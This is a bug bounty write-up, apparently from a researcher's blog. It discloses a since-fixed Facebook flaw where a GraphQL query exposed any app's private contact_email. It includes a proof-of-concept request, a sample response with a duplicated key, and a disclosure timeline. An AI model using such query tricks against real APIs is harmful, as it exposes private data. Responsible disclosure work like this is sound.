Posted on January 27, 2020

Disclose contact_email of any Facebook application

In Facebook developer application dashboard there is field “contact_email” which means to be secret and use to communication between app admin/developer and Facebook.

However, accessing this field using Graph API was secured but changing query field to GraphQL call, I was able to access the Email ID of any Facebook Application.

Proof of concept

Request:

POST /graphql
Host: graph.facebook.com

q=nodes(35xxxxx28){name,contact_email}

Response:

{
  "35xxxxx28": {
    "name": "Facebook Application Name"
    "name": "contact@company.com"
  }
}

Impact

This could have let a malicious user to access the contact_email of any application using GraphQL.

Timeline

21 Nov, 2018 – Report Sent.
28 Nov, 2018 – Triaged.
29 Jan, 2019 – Fixed.
12 Feb, 2019 – Bounty Awarded.

Categories: Security, Writeup

Tags: Facebook

Share on:

Facebook
Twitter
Email